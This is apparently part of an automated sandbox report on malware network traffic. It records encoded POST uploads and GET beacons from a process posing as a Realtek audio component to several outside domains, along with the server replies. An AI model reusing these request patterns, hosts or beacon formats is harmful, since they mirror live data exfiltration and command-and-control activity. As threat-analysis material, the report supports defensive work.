                                                                                                                                                                              set-cookie: __tad=1736564148.6182786; expires=Tue, 09-Jan-2035 02:55:48 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                                                                                              Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              16192.168.11.2049774103.224.182.242806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:51.353039980 CET485OUTGET /3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:55:51.550105095 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:55:51 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564151.3170118; expires=Tue, 09-Jan-2035 02:55:51 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-length: 1460
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 69 53 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 59 71 66 6a 42 5a 72 61 37 58 79 61 42 4f 53 6d 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 4f 42 71 53 4b 65 54 52 4c 6b 2f 66 61 42 59 55 52 57 38 5a 65 46 74 2f 4a 6e 6e 58 4c 75 67 59 61 2f 38 4c 6f 33 51 69 4f 33 59 53 68 48 70 6d 33 4b 4a 4c 4d 68 57 64 74 69 61 6f 39 66 46 47 67 3d 26 42 69 3d 7a 4a 5f 77 36 79 50 47 26 27 3b 0a 0a 2f 2f [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:55:51.550116062 CET443INData Raw: 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 69 53 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 59 71 66 6a 42 5a 72 61 37 58 79 61 42 4f 53 6d 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 4f 42 71 53 4b 65
                                                                                                                                                                              Data Ascii: w.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG&fp=-3'>Click here to enter</a></div><noscript><meta http-equiv="refresh" content="0; UR


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              17192.168.11.2049775101.35.209.183806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:05.514523983 CET758OUTPOST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 32 43 35 5a 6e 4f 54 59 6b 2b 39 77 64 42 59 48 57 50 6c 51 6d 4c 37 38 37 4e 55 30 61 74 6f 31 37 62 63 38 79 50 4e 43 74 65 54 70 4c 7a 52 49 42 56 36 41 37 72 76 78 41 51 59 37 72 58 61 55 47 4d 79 53 55 39 36 39 55 6b 38 36 6b 68 59 78 55 76 63 63 6c 64 36 73 44 45 4c 4e 37 31 69 50 64 36 76 49 39 48 6f 2b 75 6e 4c 77 58 74 66 4f 4a 36 33 4e 67 58 36 34 66 47 42 75 58 6e 6a 54 75 6e 38 50 72 66 66 35 37 33 78 5a 48 42 59 53 48 73 65 66 71 35 69 35 42 52 6a 5a 53 67 4f 54 75 6b 35 78 35 33 30 6d 63 38 2f 37 6e 51 6a 4a 6b 4e 4f 66 62 77 3d 3d
                                                                                                                                                                              Data Ascii: iS=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefq5i5BRjZSgOTuk5x530mc8/7nQjJkNOfbw==
                                                                                                                                                                              Jan 11, 2025 03:56:05.828511953 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:05 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              18192.168.11.2049776101.35.209.183806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:08.361296892 CET778OUTPOST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 63 31 2b 4f 67 38 7a 4e 6c 43 67 2b 54 70 54 44 52 4e 4d 31 36 39 37 72 7a 44 41 55 59 37 72 58 4f 55 47 4a 65 53 55 4b 75 36 55 30 38 30 72 42 59 6b 51 76 63 63 6c 64 36 73 44 46 76 6e 37 30 4b 50 64 49 37 49 38 6a 38 39 31 48 4c 78 55 74 66 4f 4e 36 33 4a 67 58 36 61 66 44 5a 49 58 69 76 54 75 6a 73 50 72 75 66 2b 78 33 78 66 59 52 5a 4e 41 4a 48 4a 6b 64 4f 47 4e 68 32 48 56 78 57 34 69 53 30 72 6b 46 41 43 66 76 6a 4a 6a 67 61 68 6d 50 50 45 47 34 61 75 45 72 6f 43 79 2f 35 2f 33 4d 6a 71 61 41 4b 74 53 4b 63 3d
                                                                                                                                                                              Data Ascii: iS=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfvjJjgahmPPEG4auEroCy/5/3MjqaAKtSKc=
                                                                                                                                                                              Jan 11, 2025 03:56:08.682080984 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:08 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              19192.168.11.2049777101.35.209.183806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:11.197020054 CET2578OUTPOST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 6b 31 2b 59 55 38 79 71 35 43 68 2b 54 70 4e 7a 52 4d 4d 31 36 73 37 72 36 4b 41 55 56 45 72 56 32 55 48 72 57 53 63 66 43 36 66 30 38 30 7a 78 59 77 55 76 63 7a 6c 64 71 77 44 46 2f 6e 37 30 4b 50 64 4a 4c 49 38 33 6f 39 33 48 4c 77 58 74 66 53 4a 36 33 78 67 58 79 77 66 44 56 2b 58 52 6e 54 75 44 38 50 34 73 33 2b 73 6e 78 64 62 52 5a 46 41 4a 43 58 6b 5a 57 73 4e 68 44 71 56 77 65 34 30 32 6f 39 6d 30 38 6f 63 65 58 4a 6b 68 2b 72 6d 5a 65 56 50 2f 43 71 53 35 6b 34 31 6f 42 32 78 76 58 6c 42 6c 47 77 4d 2f 38 65 48 56 79 74 49 75 5a 59 69 74 33 47 44 35 6d 37 38 44 48 6c 62 48 74 62 4b 62 48 74 59 34 75 43 41 32 39 73 45 49 32 61 54 62 38 4f 6f 6c 78 6e 72 43 6e 36 48 6c 46 6a 55 75 68 6c 4a 4f 62 6f 73 49 37 78 47 2b 74 71 65 38 4a 33 77 4c 68 61 73 57 73 6e 70 52 4f 2b 6f 66 4c 51 78 43 42 7a 46 4c 4f 4d 79 48 4b 7a 39 6b 33 63 33 59 54 61 63 4a 38 53 53 4f 6e [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafk1+YU8yq5Ch+TpNzRMM16s7r6KAUVErV2UHrWScfC6f080zxYwUvczldqwDF/n70KPdJLI83o93HLwXtfSJ63xgXywfDV+XRnTuD8P4s3+snxdbRZFAJCXkZWsNhDqVwe402o9m08oceXJkh+rmZeVP/CqS5k41oB2xvXlBlGwM/8eHVytIuZYit3GD5m78DHlbHtbKbHtY4uCA29sEI2aTb8OolxnrCn6HlFjUuhlJObosI7xG+tqe8J3wLhasWsnpRO+ofLQxCBzFLOMyHKz9k3c3YTacJ8SSOn8LVNDCj9QnVAPQCu3vKGrIloMv63OMz2j2LHy7EJdRitDHxDyU+YR/nGn+g0iPMaJsGdaLXBE5ngtrEzXBTGqk6S+l2okZyUyGdZOijBbkmWA9I60T9rkDsvCba5j2SQSfTgyq/bwQsPMum1uGoCopeE5AZecxb8MoMWVge6syIYX9gy69xXJ/FeANLtyD9ugVCOZGgzhOWzVKjMK/5scA5ipxL7qCJj/ErowVIEHbYpFKFkk0PB4R3lAIDkfg0qqaeMaWl6mdXymtxjkaYOaQaD1Cm9lzLFf/ws8lhC949uQFl55VfhyhIcwmCFnF5txNVMUbWJZ4n/HBAD1tiZkbThMhw8qlMNB6gpwnfJBocoxUz3JXWl1T+58IQkKuPvMvzojvjsxYNokF6GpYC9MqiZFud9qqV74WUTSOrcOmcNOQQOE1xYcVlcHJLtOI6a69S5pDVMA98/sPl32OK4PpthTVjsQ4AID0k8/+Z+Exm6aUxJRES+RN5fmaPxvW5Pq3pmrUxE9++I/4gMvJcD9Vgd+DEVGq7InWEQuXZdSxPFcSUlUQzSIa4wJZxkKadRuDLjfGvabPn9dHqHN2b9rqh1DHByiypOZed8yjq4qOMrO9nJw0UJEZJdkz/uRRjMusclmk2Hl9yf2GO5Od/N+lo0rdfN1/Ehye [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:56:11.197084904 CET5349OUTData Raw: 68 78 35 6c 64 76 54 6a 6a 63 39 37 6a 64 72 67 71 4e 69 2f 31 69 72 55 72 36 63 32 7a 41 77 35 38 43 37 77 4a 64 63 79 6e 6b 37 34 75 2b 6b 4b 48 2f 69 47 4a 43 69 6b 2f 53 70 56 58 71 53 31 44 4a 78 67 34 62 67 62 72 38 39 69 5a 39 58 76 63 33
                                                                                                                                                                              Data Ascii: hx5ldvTjjc97jdrgqNi/1irUr6c2zAw58C7wJdcynk74u+kKH/iGJCik/SpVXqS1DJxg4bgbr89iZ9Xvc3q1SJo6MTvNgsk76IauEVFKvA3MJCwg6CIDrj28tbryfEVpZBgNR27NAm4msjX7t5C6yOJ2XTuCSmPMsSV8uVeiPplI2chkwBCgQNRv0TT6FU7YJz8JTQn2/yimQhfa01/uH5Ledl7PuQbyNNEPqXOiwqUykc432zD
                                                                                                                                                                              Jan 11, 2025 03:56:11.510946989 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:11 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              20192.168.11.2049778101.35.209.183806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:14.030600071 CET488OUTGET /31pt/?iS=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:56:14.333808899 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:14 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              21192.168.11.2049779154.23.178.231806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:20.052020073 CET746OUTPOST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 32 32 64 54 45 62 59 49 73 5a 48 6e 75 79 6b 64 4b 72 34 55 6c 42 61 55 39 79 4c 68 54 6a 71 35 63 6f 7a 71 33 76 45 2f 32 56 4c 53 57 65 4f 33 4f 4e 37 62 36 7a 78 49 49 6e 75 58 78 66 41 36 65 41 58 2f 6d 48 49 41 57 7a 41 52 6a 4f 37 36 74 34 33 75 49 59 6e 43 4d 52 52 36 43 50 51 30 6b 6e 4a 72 49 47 4d 71 4b 61 6f 5a 53 63 39 62 79 52 57 65 71 49 71 2b 6a 76 57 78 4e 79 6b 67 67 51 6e 64 6d 78 57 38 32 44 49 53 4c 59 32 74 36 54 41 37 4b 71 44 44 76 4a 4e 57 30 38 42 30 6a 64 38 4c 4f 5a 6d 30 6b 41 7a 47 38 77 37 4d 4f 6b 6f 31 67 3d 3d
                                                                                                                                                                              Data Ascii: iS=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA7KqDDvJNW08B0jd8LOZm0kAzG8w7MOko1g==
                                                                                                                                                                              Jan 11, 2025 03:56:20.357069969 CET312INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:20 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
